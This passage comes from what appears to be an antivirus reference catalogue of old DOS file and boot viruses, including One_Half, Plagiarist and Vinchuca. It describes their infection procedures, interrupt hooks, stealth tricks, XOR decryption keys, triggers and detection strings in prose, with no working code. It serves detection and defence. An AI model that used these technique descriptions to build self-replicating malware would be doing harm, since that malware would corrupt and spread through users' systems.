  29502.     Every 9th  day of 1997
  29503.      "   10th  "  "  1998
  29504.      "   11th  "  "  1999 .... and so on
  29505.  
  29506. The following formula describes how to determine the trigger day for
  29507. the current year:
  29508.  
  29509.     Trigger Day = (Current Year - 1988)
  29510.  
  29511. The payload executed by the virus during the date of trigger just hangs
  29512. the system after infecting the loading and executing file. It then
  29513. clears the screen and displays:
  29514.  
  29515.   "I see, I come, I conquer...Trojan horse - CHAOS v2.0 by
  29516.    Faust".
  29517.  
  29518. The virus occupies 1,840 bytes of the memory as checked using DOS
  29519. CHKDSK.
  29520.  
  29521. Damage: Hangs the system.
  29522.  
  29523. Symptom: Infected files increase by 1,241 for .COM and 1,247 for .EXE.
  29524.  
  29525. [Chill]
  29526. Virus Type:  Polymorphic, File Virus
  29527. Virus Length: 544 bytes
  29528. Virus Infect Type: .COM files
  29529. Virus Re-infect: no
  29530. Virus Memory Type: High memory resident
  29531. Place of Origin:
  29532.  
  29533. PC Vectors Hooked: INT 21h
  29534.  
  29535. Infection Procedure:
  29536. The virus only infects .COM files. It increases an infected file's size
  29537. by 544 bytes. The virus infects the host file by attaching itself at the
  29538. end of the file. As a polymorphic virus, it first decrypts its 544 bytes
  29539. code using XOR 6AH to each byte. Then the virus allocates 1200 bytes in
  29540. the high memory (9FB4:0000) and copies its code there to stay resident.
  29541. Then it hooks INT 21H by changing its vector to point to its program in
  29542. the high memory (9FB4:00B9). The virus will become memory resident upon
  29543. loading and execution of an infected file. Once it has become resident
  29544. it will infect other .COM files when it is loaded and executed because
  29545. it uses the altered service 4BH of INT 21H which first attaches the
  29546. virus code into the host file before giving control to the host. It
  29547. also sets the date attribute of the infected file to 01-01-94.
  29548.  
  29549. Damage: None
  29550.  
  29551. Symptom: Increases the host's file size by 544 bytes.
  29552.  
  29553. [Three_Tunes]
  29554. Virus Type:
  29555. Virus Length: Approximately 1784 bytes
  29556. Virus Re-infect: Does not re-infect, infected file size is consistent
  29557. Virus Memory Type: High Memory
  29558. Place of Origin:
  29559.  
  29560. PC Vectors Hooked: Int 21h, Int 1Ch
  29561.  
  29562. Infection Procedure:
  29563. 1) Loads itself to high memory, allocating 2304 bytes (9F70:0000).
  29564. 2) Infects *.EXE files. Copies the virus code to the host program,
  29565.    adding approximately 1784 bytes. Loads first the virus before
  29566.    running the host program.
  29567.  
  29568. While memory resident, the virus infects any executed *.EXE files.
  29569. It does not do anything special. It just replicates when it is resident
  29570. in the memory. Only infects executed files.
  29571.  
  29572. Damage:
  29573. 1) Free memory decreases by approximately 2304 bytes.
  29574. 2) Increase in file size. Adds approximately 1784 bytes.
  29575.  
  29576. Note:
  29577. The virus checks first if the current month is June using Int 21 (2A).
  29578. If it is, it triggers the virus code; otherwise, it just exits the
  29579. program. Then, the virus checks for the system time using Int 21 (2C).
  29580. It uses a special formula that is used to select which payload to
  29581. execute. There are 4 possible payloads which will be discussed later.
  29582. But first, the formula:
  29583.  
  29584.            Int 21 (2C):
  29585.            Significant register CX,
  29586.            Adds CH to CL and returns the sum to CL (Add CL,CH)
  29587.            uses the AND boolean between CL,03      (And CL,03)
  29588.            clears CH to 00                         (XOR CH,CH)
  29589.            compares Cl to 4 possibilities          (CMP CL,+03)
  29590.  
  29591. The virus uses this procedure to get 00, 01, 02, 03 as values for CL.
  29592. Each value corresponds to a certain tune. (03 doesn't have a tune to
  29593. play) When the infected file is run, a specific tune depending on the
  29594. time and the result after manipulating the time is played. A total of
  29595. three tunes are played. Whatever tune is played, infection remains
  29596. the same, even if it plays nothing.
  29597.  
  29598. Symptom:
  29599. 1) Delay in program execution due to virus activity.
  29600. 2) Plays various tunes.
  29601.  
  29602. [Phx.96S]
  29603. Alias:
  29604. Origin:
  29605. Eff Length: 965-968 bytes
  29606. Virus Type:
  29607.  
  29608. Symptoms:
  29609. Infected EXE and COM files increase by 965-968 bytes and
  29610. there is a decrease of 1024 in the available memory.  When in
  29611. a write-protected floppy, it usually displays a "Write Protect
  29612. Error" message when an attempt to read it is made.
  29613.  
  29614. General Comments:
  29615. On the first infection, this virus will first allocate 1024 bytes in
  29616. the High Memory Area and then transfer 965 bytes of its code to that
  29617. area.  It will then hook INT 21 with infection procedures to
  29618. services 4B00(Execute Program), 3D02(Open File Handle), and 40(Write
  29619. to File/Device).
  29620.  
  29621. This virus will infect all EXE and COM files that are opened, renamed,
  29622. or executed.
  29623.  
  29624. The virus is named as such because of the string "PHX" on the virus
  29625. code.
  29626.  
  29627. [HI.460]
  29628. Virus Type: File Virus
  29629. Other Name:
  29630. Virus Length:
  29631. Virus Infect Type: EXE files
  29632. Place of Origin:
  29633. Virus Memory Type: High Memory Type
  29634.  
  29635. PC Vectors Hooked: Int 21h
  29636.  
  29637. Infection Procedure:
  29638. 1) Checks if the value stored in DS:[0164] is 2ED3h (if 2ED3h is not
  29639.    moved to that address).
  29640. 2) Loads itself in the high memory in address 9FC0:0h.
  29641. 3) Hooks interrupt 21h, then sets it. Once in the memory, the virus
  29642.    waits for an EXE file to be executed to infect it. A word "Hi"
  29643.    can be found in the virus code for every infected EXE file.
  29644.  
  29645. [Liberty.2857.A]
  29646. Virus Type: File Virus
  29647. Other Name:
  29648. Virus Length:
  29649. Place of Origin:
  29650. Virus Memory Type: High Memory type
  29651.  
  29652. PC Vectors Hooked: Int 21h
  29653.  
  29654. Infection Procedure:
  29655. 1) Loads itself from 11B0:0110 to 9DEE:0110h, with 2858 bytes.
  29656. 2) Encrypts the data from 11B0:[0115] with CX value = 3Ch. In this,
  29657.    "LIBERTY" can be found but after encrypting it the data in that
  29658.    address will become "Me BC.".
  29659. 3) Encrypts the message again from 11B0:0113h to 114C:0100h and produces:
  29660.    "- M Y S T I C - COPYRIGHT (c) 1989-2000, by SsAsMsUsEsL"
  29661. 4) After it is loaded in the high memory, it waits for an EXE
  29662.    or COM file to be executed to infect it.
  29663.  
  29664. [Sibylle.853]
  29665. Virus Type: File Virus
  29666. Virus Length: Approximately 867 bytes
  29667. Virus Memory Type: High Memory
  29668. Place of Origin:
  29669. Trigger Condition: Activates only if the millionth of a second is
  29670.                    less than 32. If not, then it just exits the code
  29671.                    without loading itself to the memory.
  29672.  
  29673. PC Vectors Hooked: Int 21h, Int 2Fh
  29674.  
  29675. Infection Procedure:
  29676. 1) Loads itself to high memory, allocating 928 bytes (using MEM).
  29677. 2) Moves 904 (01C4H x 2) bytes to high memory.
  29678. 3) Infects *.EXE files. Copies the virus code to the host program,
  29679.    adding approximately 867 bytes. Loads first the virus before
  29680.    running the host program.
  29681.  
  29682. While memory resident, the virus infects any executed *.EXE files.
  29683. It does not do anything special. It just replicates when it is resident
  29684. in the memory. Only infects executed files.
  29685.  
  29686. Damage:
  29687. 1) Free memory decreases by approximately 928 bytes.
  29688.    Using MEM.EXE, 928 bytes will be used by MSDOS (tricky).
  29689. 2) Increase in file size. Adds approximately 867 bytes.
  29690.  
  29691. Symptom: Delay in program execution due to virus activity.
  29692.  
  29693. Detection method: Locate the virus text strings.
  29694.  
  29695. [Fich-1]
  29696. Virus Type: File Virus
  29697. Other Name:
  29698. Virus Length:
  29699. Virus Infect Type: COM files (including COMMAND.COM)
  29700. Place of Origin:
  29701. Virus Memory Type: MCB Type
  29702.  
  29703. PC Vectors Hooked: Int 21h
  29704.  
  29705. Infection Procedure:
  29706. The virus is a TSR program. After the virus is executed
  29707. it immediately infects COMMAND.COM. Then it
  29708. waits for another file to be executed to infect it. This
  29709. virus only infects COM files. When one uninfected file
  29710. is executed another COM file gets infected.
  29711. Also, the virus doesn't re-infect files. Before the virus
  29712. loads itself to the memory, it checks first whether the virus
  29713. is already memory resident.
  29714.  
  29715. Note: The virus makes a smart move by hooking Int 1 and 3 to
  29716. fool the one debugging it.
  29717.  
  29718. [Hdenowt]
  29719. Virus Type: File Virus
  29720. Other Name:
  29721. Virus Length:
  29722. Virus Infect Type: COM and EXE files (including COMMAND.COM)
  29723. Place of Origin:
  29724.  
  29725. PC Vectors Hooked: Int 21h
  29726.  
  29727. Infection Procedure:
  29728. 1) Saves the first 16 bytes to address 114C:08D5h and
  29729.    later changes the first 16 bytes at 0:0 from 11BA:0285h. But
  29730.    before changing, an encryption occurs starting in 11BA:012Eh by
  29731.    XORing it to 95h, 288 bytes.
  29732. 2) When the virus code is executed, it locates COMMAND.COM,
  29733.    then it searches for other COM and EXE files in the same
  29734.    directory where the virus is executed. The infection can't
  29735.    be easily be seen because the size of the file is still the
  29736.    same.
  29737.  
  29738. Symptom: Infected files increase by approximately 1700 bytes.
  29739.  
  29740. [Kacz]
  29741. Origin:
  29742. Eff Length: 4444 bytes
  29743. Virus Type: Polymorphic File Virus
  29744.  
  29745. Symptoms :
  29746. EXE files increase by 4444 bytes and there is a decrease
  29747. of 6144 bytes in the available memory. Infected files tend to
  29748. display messages like: "Error Loading Program File", "File not
  29749. Found", and "Memory Allocation Error."
  29750.  
  29751. General Comments:
  29752. On the first infection, KACZ first decrypts 4387 bytes of its
  29753. code and then allocates 6144 bytes in the High Memory
  29754. Area. It then transfers 4387 bytes of its code to that area.
  29755. It then hooks INT 13 and INT 21. Then reads the Boot Record of the hard
  29756. disk and tries to modify it. It writes the new infected Boot Record on
  29757. the hard disk so every time it is used for booting up the virus will be
  29758. memory resident.
  29759.  
  29760. This virus will infect all EXE files that are opened, renamed,
  29761. or executed.  It will also change the file's Second field to 62.
  29762.  
  29763. These messages are found in the decrypted virus code:
  29764.  
  29765.            "Zrobione"
  29766.            "Wersja"
  29767.            "Kodowanie"
  29768.            "Liczmik HD"
  29769.            "K a c z,o r t e s t"
  29770.  
  29771.  
  29772. [V-BCIV-1]
  29773. Other Name: VIENREBO
  29774. Virus Type: File Virus
  29775. Virus Length: Approximately 648 bytes
  29776. Virus Re-infect: Does not re-infect, infected file size is consistent.
  29777.                  If the file is already corrupted it skips and looks
  29778.                  for another COM file.
  29779. Virus Memory Type: Non Resident, Direct Infector
  29780. Place of Origin:
  29781.  
  29782. PC Vectors Hooked: Int 21h
  29783.  
  29784. Infection Procedure:
  29785. Directly infects *.COM files when an infected file is executed. Copies
  29786. the virus code to the host program, adding approximately 648 bytes.
  29787. Loads the virus first before running the host program.
  29788.  
  29789. The virus first gets and sets DTA for transfer purposes.
  29790. The virus then searches for *.COM files within the directory using
  29791. Int 21 (4E and 4F). If the search is successful, the virus gets the
  29792. file's attribute using Int 21 (43). It changes its attribute to enable
  29793. the write function (especially for the COMMAND.COM). It takes note of
  29794. the file time and date using Int 21 (51) so that when it accomplishes
  29795. its task of altering the code, it can save the file using the original
  29796. file time and date. This therefore deceives the user that the file was
  29797. never been changed.
  29798.  
  29799. Every time an infected file is executed, one COM file is infected
  29800. within the same directory.
  29801.  
  29802. Damage:
  29803. 1) Increase in file size. Adds approximately 648 bytes.
  29804. 2) Corrupts COMMAND.COM, making it unusable. Other COM files run
  29805.    normally.
  29806.  
  29807. Symptom: Delay in program execution due to virus activity.
  29808.  
  29809. [Nightfall.4518]
  29810. Origin:
  29811. Eff Length:
  29812. Virus Type: File Virus
  29813.  
  29814. General Comments:
  29815. 1) Decrypts a part of its code with a size of 4526 bytes and then
  29816.    decrypts it again.
  29817. 2) Checks if it is already loaded in the memory by checking the
  29818.    interrupt vectors of INT 13, INT 21 and INT 2A.
  29819. 3) Allocates 5680 bytes in the High Memory Area.
  29820.  
  29821. After loading itself resident in the High Memory Area, the virus seems
  29822. to be doing nothing. It is possible that the virus has some bugs.
  29823.  
  29824. [Dig.Death.3787]
  29825. Virus Type: Polymorphic, File Virus
  29826. Virus Length: 3,547 bytes
  29827. Virus Infect Type: .COM and .EXE file
  29828. Virus Re-infect: No
  29829. Virus Memory Type: High memory resident
  29830. Place of Origin:
  29831.  
  29832. PC Vectors Hooked: INT 21h, INT 13h, INT 1Ch
  29833.  
  29834. Infection Procedure:
  29835. The virus infects both .EXE and .COM files. It infects its host file by
  29836. attaching itself at the end of the file. It increases an infected
  29837. file's size by 3,547 bytes. The virus can become memory resident upon
  29838. loading and executing an infected file. As a polymorphic virus it
  29839. first decrypts 3,422 bytes of its code. Then it allocates 5,120 bytes
  29840. in the high memory starting at 9EB0:0000. From there it hooks to INT
  29841. 21H by pointing its vector to its program in the high memory. It uses
  29842. service 4BH of the interrupt to be able to attach itself to loading and
  29843. executing files. It also uses service 4EH and 4FH to hide the actual
  29844. increase in the sizes of the infected files once the virus has become
  29845. memory resident; thus, the infection is unnoticeable. Once the virus
  29846. has attached itself to the host file the virus encrypts its code again
  29847. and writes it to a new file. No payload or trigger was seen. The virus
  29848. just replicates itself to .COM and .EXE files.
  29849.  
  29850. Symptom: Infected files increase by 3,547 bytes.
  29851.  
  29852. [Vinchuca]
  29853. Virus Type: File Virus
  29854. Virus Length: Encrypted code size is 912 bytes
  29855. Virus Memory Type: High Memory
  29856. Place of Origin:
  29857.  
  29858. PC Vectors Hooked: Int 21h, Int 27h
  29859.  
  29860. Infection Procedure:
  29861. 1) Loads itself to high memory, loading approximately 1328 bytes.
  29862. 2) Infects *.COM files. Copies the virus code to the host program
  29863.    (code size is 912 bytes). Loads the virus first before running
  29864.    the host program.
  29865. 3) While memory resident, the virus infects all COM files that are
  29866.    opened.
  29867.  
  29868. The virus code is transferred to the allocated memory space using Int
  29869. 21 (4A). The actual virus code is immediately executed upon meeting
  29870. the requirements.
  29871.  
  29872. The virus is TSR, using Int 27. Basically, the virus reacts by
  29873. transferring its code to the high memory before actually attaching it
  29874. to the code itself.
  29875.  
  29876. Symptom: May display
  29877.  
  29878.     "Saludos para Satanic Brain y Patoruzi"
  29879.     "Virus Vinchaca v.1,0 1993"
  29880.     "Creado por Murdock."
  29881.     "Buenos Aires, Argentina"
  29882.     "Su PC tiene mal chagas....jajaja...."
  29883.  
  29884. which appears in the virus code.
  29885.  
  29886. Detection method: Decrypt the virus code before detection. Look for
  29887. the above strings.
  29888.  
  29889. Note: The virus code contains Int 13 (16) which tests for the disk
  29890. change information.
  29891.  
  29892. [Ginger.2774]
  29893. Virus Type: File Virus
  29894. Other Name:
  29895. Virus Length:
  29896. Place of Origin:
  29897. Virus Memory Type: OS Memory Type (after rebooting=High Mem)
  29898.  
  29899. PC Vectors Hooked: Int 21h, Int 13h
  29900.  
  29901. Infection Procedure:
  29902. The virus is an OS type, hooking Int 13 and 21h.
  29903. The virus infects the boot record first, so when the
  29904. machine is reset, the virus will be loaded in the high
  29905. memory. From there it infects files. It allocates 4096 bytes
  29906. in the memory.
  29907.  
  29908. The problem is whenever the virus is executed and the
  29909. machine is reset, after rebooting, the keyboard
  29910. doesn't work due to the use of Int 15h. Because of this
  29911. no infection will occur.
  29912.  
  29913. [Mirea.1788]
  29914. Alias:
  29915. Origin:
  29916. Eff Length: 1788 bytes
  29917. Virus Type: File Virus (COM files)
  29918.  
  29919. Symptoms :
  29920. COM files will increase by 1788 bytes, and there will be a decrease
  29921. of 2368 bytes in the available memory. Execution of running programs
  29922. will slow down.
  29923.  
  29924. General Comments:
  29925. The MIRE1788 virus first allocates memory with a size of 2368 bytes
  29926. and then transfers its virus code to the High Memory Area with a size
  29927. of 1788 bytes. It will then check the date if the day is 13. And
  29928. then it will hook INT 8, INT 9 and INT 21. This allows the virus to
  29929. infect other .COM files.
  29930.  
  29931. If the day of the month is 13, the virus is memory resident and the
  29932. keyboard has not been pressed for 30 minutes, the virus will
  29933. display a red dialog box at the center of the screen with ASCII text
  29934. written on it. The only readable characters are the numbers 16 and
  29935. a set of numbers 133-20-60.
  29936.  
  29937. It also hides an infected file when a DIR at the command prompt is
  29938. executed so as to hide the increase in the size of the infected
  29939. file.
  29940.  
  29941. [Little-Red]
  29942. Virus Type: File Virus
  29943. Virus Length: 1465 bytes
  29944. Virus Infect Type:  n/a
  29945. Trigger Condition: Year < 1994, Date = Sept. 9, Dec. 26
  29946. Virus Re-infect:  n/a
  29947. Virus Memory Type: High Memory Resident
  29948. Place of Origin:
  29949.  
  29950. PC Vectors Hooked:  INT 1Ch, INT 21h, INT 24h
  29951.  
  29952. Infection Procedure:
  29953. 1) Decrypts a part of its code and then executes it which turns out to
  29954.    be a "Get DOS Version" function. The virus uses this function
  29955.    because it directly controls DOS' resources.
  29956. 2) Encrypts this part again.
  29957. 3) Modifies the Allocated Memory and allocates 2048 bytes in the High
  29958.    Memory Area. It is now ready to transfer the virus code into HMA
  29959.    with a size of 1465 bytes.
  29960. 4) In the high memory area, the virus hooks INT 1C, 21 and 24.
  29961. 5) Opens the file being executed and checks if it is a .COM file; if it
  29962.    is, it checks if the file is already infected; if not, the virus
  29963.    infects it. After infection, the virus changes the attribute of
  29964.    "C:\COMMAND.COM" from "read-only" and "system" to "archive".
  29965.  
  29966. [Civil_defense_FB]
  29967. Virus Type:  Boot, File Virus
  29968. Virus Length: 6656 bytes
  29969. Original Name: CIVIL DEFENSE
  29970. Virus Infect Type: .COM and .EXE files
  29971. Virus Re-infect: no
  29972. Virus Memory Type: Non-memory resident
  29973. Place of Origin:
  29974.  
  29975. Infection Procedure:
  29976. The virus primarily infects the Master Boot Sector of drive C:\. It
  29977. first reads the boot sector of drive C:\ and the following sector
  29978. (head 0, cylinder 0, sector 2) in its program. Then it reads 1
  29979. sector from head 0, cylinder 87, sector 65 of drive C:\. The virus
  29980. sets this up by copying other data from the original boot record, and
  29981. then writes this to the boot sector of drive C:\; thus, replacing the
  29982. original one. Then it copies its 6,656 bytes code (13 sectors) to
  29983. sector 66, cylinder 87, head 0 of drive C:\.
  29984.  
  29985. During the analysis it was seen that it infected the virus program file
  29986. CIV6672.EXE by opening it, copying its own header to the file, moving
  29987. the file pointer to the end of the host file (CIV6672.EXE), and then
  29988. performing INT 40H (Write to file) with the size of memory to write
  29989. equals 0 (CX=0000). Thus, it just corrupts the virus program file. It
  29990. was not seen how the infected boot sector loads its program from sector
  29991. 66, cylinder 87, head 0 of drive C:\ which may be the reason why the
  29992. infected boot sector doesn't infect the loaded and executed files.
  29993.  
  29994. There was also no interrupt hook, memory allocation to make it resident,
  29995. and trigger seen. As verified from DOS CHKDSK, there was no change in
  29996. the memory allocation after loading the virus program CIV6672.EXE.
  29997. Therefore, it was concluded that the virus infects the boot sector by
  29998. directly running the virus program file without knowing how the virus
  29999. can replicate itself in other executable files that can infect the
  30000. Master Boot Sector of drive C:\ upon loading and execution of the
  30001. files.
  30002.  
  30003. Symptom: Slows down the file loading and execution time.
  30004.  
  30005. [Plagiarist.2051]
  30006. Alias: PLAGIARIST
  30007. Origin:
  30008. Eff Length: 2051 bytes
  30009. Virus Type: Multi-partite Virus
  30010.  
  30011. Symptoms :
  30012. EXE and COM files increase by 2051 bytes and there is a decrease of
  30013. 2048 bytes in the available memory.
  30014.  
  30015. General Comments:
  30016. On the first infection, the virus checks if the date is between 1993
  30017. and 2042. If this is the case, it makes a copy of the boot
  30018. record at the logical end of the drive and transfers its code
  30019. right after the boot record.  Then it replaces the current boot
  30020. record with its own infected boot record.  The virus will not activate
  30021. at this time. It will activate when you boot from the infected drive.
  30022.  
  30023. The virus allocates 2048 bytes in the high memory and transfers the
  30024. virus code in the disk to the High Memory Area. Afterwards it hooks
  30025. INT 21, INT 28, INT 08, and INT 13.
  30026.  
  30027. [VLamiX]
  30028. Virus Type: File Virus
  30029. Virus Length: Approximately 1062 bytes
  30030. Virus Memory Type: High Memory
  30031. Place of Origin:
  30032.  
  30033. PC Vectors Hooked: Int 21h, Int 10h
  30034.  
  30035. Infection Procedure:
  30036. 1) Loads itself onto the high memory, allocating approximately 1,136
  30037.    bytes.
  30038. 2) Infects *.EXE files. Copies the virus code to the host program,
  30039.    adding approximately 1091-1106 bytes. Loads the virus first before
  30040.    running the host program.
  30041. 3) While memory resident, the virus infects all opened EXE files.
  30042.  
  30043. The virus code is decrypted. The virus reacts ordinarily by allocating
  30044. space in the memory before infecting files. Nothing extraordinary
  30045. happens. It just attaches its code to the host program.
  30046.  
  30047. Symptom: May display
  30048.  
  30049.      "Smartc*.cps chklist*"
  30050.      "-=* Die-lamer *=-"
  30051.      "chklist ???"
  30052.      "chklist.cps"
  30053.      "Vlamix-1"
  30054.  
  30055. which appears in the decrypted code.
  30056.  
  30057. Detection method: Decrypt the virus code before detection. Look for
  30058. the above strings.
  30059.  
  30060. [Sleepwalker]
  30061. Virus Type: File Virus
  30062. Virus Length: At the range between 1268-1282
  30063. Virus Memory Type: High Memory
  30064. Place of Origin:
  30065.  
  30066. PC Vectors Hooked: Int 21h, Int 1Ch
  30067.  
  30068. Infection Procedure:
  30069. 1) Loads itself onto the high memory, allocating approximately 1552
  30070.    bytes.
  30071. 2) Infects *.COM files. Copies the virus code to the host program.
  30072.    Loads the virus first before running the host program.
  30073. 3) While memory resident, the virus infects all opened COM files.
  30074.  
  30075. The virus code is transferred to the allocated memory space using Int
  30076. 21 (4A). The allocation space setting is determined by checking the
  30077. memory from high to low using Int 21 (5801). The virus also uses the
  30078. Int 1c handler to take note of the timer tick, possibly using it for
  30079. some payload.
  30080.  
  30081. Basically, the virus reacts by transferring its code to the high memory
  30082. before actually attaching it to the code itself. The virus calls string
  30083. "STAC," but it is uncertain if the other strings are displayed.
  30084.  
  30085. Symptom: May display
  30086.  
  30087.     "STAC"
  30088.     "Sleepwalker. (c) Optus 1993."
  30089.  
  30090. which appears in the virus code.
  30091.  
  30092. Detection method: Check for the above string.
  30093.  
  30094. [Alfon]
  30095. Virus Name: ALFO1344
  30096. Virus Type: File Virus
  30097. Virus Length: 1344-1426 bytes
  30098. Virus Infect Type: .COM and .EXE files
  30099. Virus Re-infect: No
  30100. Virus Memory Type: Memory resident, MCB type
  30101. Place of Origin:
  30102.  
  30103. PC Vectors Hooked: INT 21h
  30104.  
  30105. Infection Procedure:
  30106. The virus infects both .COM and .EXE files. It infects .COM files by
  30107. moving the host program lower and attaching the whole virus program at
  30108. the beginning of the file. It's opposite with the .EXE file infection
  30109. wherein the attachment of the virus program is normal or attaches its
  30110. program at the end of the host program. The host program's file size
  30111. increases by 1344 bytes for .EXE files while 1426 bytes for .COM files
  30112. after infection.
  30113.  
  30114. The virus first detects if a file is already infected. If it is, it
  30115. leaves the file behind. If it isn't, it infects it by allocating
  30116. memory after the resident part of COMMAND.COM and copying its program
  30117. to that location. It then hooks INT 21H by changing its vector to its
  30118. program at 17F8:01CF. Upon executing the interrupt's service 4BH, it
  30119. attaches its program through the interrupt services of INT 3H which
  30120. holds the original vector of INT 21H. After attaching its program to
  30121. the host it returns to its memory resident program at 17F7:0000 to
  30122. infect other loading and executing files.
  30123.  
  30124. Symptom: Increase in file size by 1344 bytes (for .EXE) and 1426 bytes
  30125. (for .COM).
  30126.  
  30127. [HLLO.Beeper]
  30128. Virus Type: File Virus
  30129. Other Name:
  30130. Virus Length:
  30131. Virus Infect Type: EXE files
  30132. Virus Reinfect Type: Non-Resident
  30133. Place of Origin:
  30134. Virus Memory Type:
  30135.  
  30136. PC Vectors Hooked:
  30137.  
  30138. Infection Procedure:
  30139. When an infected file is executed, three EXE files will be
  30140. infected, copying their filenames and changing their extensions
  30141. to .COM. For every infected file, when executed, at most three EXE
  30142. files get infected.
  30143.  
  30144. This enables the virus code to execute first before the
  30145. original EXE file.
  30146.  
  30147. [One_Half.3544]
  30148. Virus Status:
  30149. Origin:
  30150. Eff Length: 3500-5500 bytes
  30151. Virus Type: Polymorphic Virus
  30152.  
  30153. Symptoms :
  30154. Increase in the size of infected COM and EXE files by 3544 bytes
  30155. and decrease in available memory by 5120 bytes.  Executing
  30156. programs may slow down due to the infection procedure of the virus.
  30157.  
  30158. General Comments:
  30159. One-Half is a multipartite, polymorphic virus.  It will first infect
  30160. the boot sector of a hard disk and it will only be memory resident
  30161. if the hard disk is used for booting.  During bootup, it will allocate
  30162. 5120 bytes of the memory and will reside in the High Memory Area. It
  30163. will then hook INT 21, INT 13, and INT 1C.
  30164.  
  30165. All COM and EXE files executed, opened or copied will be infected by
  30166. the virus and will increase by 3544 bytes.
  30167.  
  30168. The virus is also capable of hiding itself from anti-virus software.
  30169. It can also hide the increase in the file size 'cause it adds special
  30170. codes to check for infected files and modifies their file size when
  30171. viewed.
  30172.  
  30173. One-Half encrypts an area of the hard disk every time it starts up.
  30174. This means that it slowly encrypts all the data in your hard disk.
  30175. Though these areas are decrypted back when the virus is memory
  30176. resident, it is advisable to create a backup copy of important
  30177. files while the virus is still memory resident.  This makes the
  30178. virus hard to remove because it hides its encryption code encrypted
  30179. in the Boot Record.
  30180.  
  30181. The following messages are found in the decrypted virus code:
  30182.  
  30183.          "Dis is one half."
  30184.          "Press any key to continue"
  30185.          "Did you Leave the room?"
  30186.  
  30187. [One_Half.3570]
  30188. Virus Name: ONEH3570
  30189. Alias: ONE-HALF.3570
  30190. Origin:
  30191. Eff Length: 3500-5500 bytes
  30192. Virus Type: Polymorphic Virus
  30193.  
  30194. Symptoms :
  30195. Increase in the size of infected COM and EXE files by 3570 bytes
  30196. and decrease in available memory by 5120 bytes.  Executing
  30197. programs may slow down due to the infection procedure of the virus.
  30198. Data sometimes turn out as garbage due to the virus encryption.
  30199.  
  30200. General Comments:
  30201. One-half.3570 is a multipartite, polymorphic virus which is a variant
  30202. of the One-Half.3544. It will first infect the boot sector of a hard
  30203. disk and it will only be memory resident if the hard disk is used for
  30204. booting. During bootup, it will allocate 5120 bytes of the memory and
  30205. will reside in the High Memory Area. It will hook INT 21, INT 13, and
  30206. INT 1C.
  30207.  
  30208. All COM and EXE files executed, opened or copied will be infected by
  30209. the virus and will increase by 3544 bytes.
  30210.  
  30211. The virus is also capable of hiding itself from anti-virus software.
  30212. It can also hide the increase in the file size by adding special
  30213. codes to check for infected files and modifying their sizes when
  30214. viewed.
  30215.  
  30216. One-Half encrypts an area of the hard disk every time it starts up.
  30217. This means that it slowly encrypts all the data in your hard disk.
  30218. Though these areas are decrypted back when the virus is memory
  30219. resident, it is advisable to create a backup copy of important
  30220. files while the virus is still memory resident.  This makes one-
  30221. half hard to remove because it hides its encryption code encrypted
  30222. in the Boot Record.
  30223.  
  30224. The following messages are found in the decrypted virus code:
  30225.  
  30226.          "Dis is one half."
  30227.          "Press a key"
  30228.          "Did you leave the room?"
  30229.  
  30230. [Unsnared]
  30231. Virus Type: File Virus
  30232. Virus Length: Approximately 814 bytes
  30233. Virus Memory Type: High Memory
  30234. Place of Origin:
  30235.  
  30236. PC Vectors Hooked: Int 21h
  30237.  
  30238. Infection Procedure:
  30239. 1) Loads itself onto the high memory, allocating 1024 bytes (9FC0:0000).
  30240. 2) Moves approximately 814 bytes (032EH) in the high memory.
  30241. 3) Infects *.EXE files. Copies the virus code to the host program,
  30242.    adding approximately 814 (032EH) bytes. Loads the virus first
  30243.    before running the host program.
  30244. 4) While memory resident, the virus infects all opened EXE files.
  30245.  
  30246. The virus reacts ordinarily by allocating space in the memory before
  30247. infecting files. Nothing extraordinary happens. It just attaches its
  30248. code to the host program after it is loaded from the memory.
  30249.  
  30250. Damage:
  30251. 1) Decrease in memory free space.
  30252. 2) Increase in file size.
  30253.  
  30254. [Ant4096B]
  30255. Virus Name: ANT4096B
  30256. Virus Type: File type
  30257. Virus Length: 4096 bytes
  30258. Original Name: INVADER
  30259. Virus Infect Type: .COM and .EXE files
  30260. Virus Re-infect: No
  30261. Virus Memory Type: Memory resident, MCB type
  30262. Place of Origin:
  30263.  
  30264. PC Vectors Hooked: INT 21h, INT 8h, INT 9h
  30265.                    INT 13h
  30266.  
  30267. Infection Procedure:
  30268. The virus infects both .COM and .EXE files. It infects .COM files by
  30269. moving the host program lower and attaching the whole virus program at
  30270. the beginning of the file. It's opposite with the .EXE file infection
  30271. wherein the attachment of the virus program is normal or attaches its
  30272. program at the end of the host program. The host program's file size
  30273. increases by 4096 bytes after infection. The virus program allocates
  30274. 320 paragraphs (5120 bytes) in the lower part of the memory, after the
  30275. resident part of COMMAND.COM, specifically at 17F8:0000. It decrypts
  30276. 424 bytes of its program using XOR 46H. After decrypting it can be
  30277. seen in the data area of the virus program a string saying "by Invader,
  30278. Feng Chiu U., Warning: Don't run ACAD.EXE". Then it hooks INT 21H by
  30279. changing its vectors to 1808:05DF, INT 08H to 1808:01F9, INT 09H to
  30280. 1808:02B8, and INT 13H to 1808:0435. No payload was seen in the
  30281. interrupt hooks. The virus only infects the loaded and executed files.
  30282.  
  30283. Symptom: Infected files increase by 4096 bytes.
  30284.  
  30285. [Ontario-B]
  30286. Alias:
  30287. Origin:
  30288. Eff Length: 1024 bytes
  30289. Virus Type:
  30290.  
  30291. Symptoms :
  30292. Increase in size of COM and EXE programs by 1024 bytes and
  30293. decrease in free memory by 2048 bytes.
  30294.  
  30295. General Comments:
  30296. On the first infection, this virus will first allocate 2048 bytes in
  30297. the High Memory Area and then will transfer 1024 bytes of its code to
  30298. that area. It will then hook INT 21 with infection procedure to
  30299. services 4B00(Execute Program), 3D02(Open File Handle), 11 and 12
  30300. (Find Directory Entries).
  30301.  
  30302. This virus will infect all EXE and COM files that are opened, renamed,
  30303. or executed.  It will also hide infected files when viewed or listed
  30304. using the DIR command.
  30305.  
  30306. There seems to be no damage done by the virus other than replicate.
  30307.  
  30308. [Nov_17]
  30309. Alias: November-17th.800
  30310. Origin:
  30311. Eff Length: 800
  30312. Virus Type: File Virus
  30313.  
  30314. Symptoms :
  30315. Will increase .COM and .EXE files by 800 bytes and will allocate
  30316. 832 bytes in the High Memory Area.
  30317.  
  30318. General Comments:
  30319. On the first infection, this virus checks if the file carrier is .EXE.
  30320. It will infect .COM and .EXE differently because of the difference in
  30321. the structure of the two. It then allocates 832 bytes in the High
  30322. Memory Area and then moves its virus code to HMA.  Then it hooks INT 21,
  30323. with points to services 3D (Open File Handle), 43 (Get/Set File
  30324. Attributes) and 4B00 (Execute Child Process). After this, the virus
  30325. returns control to the original routine.
  30326.  
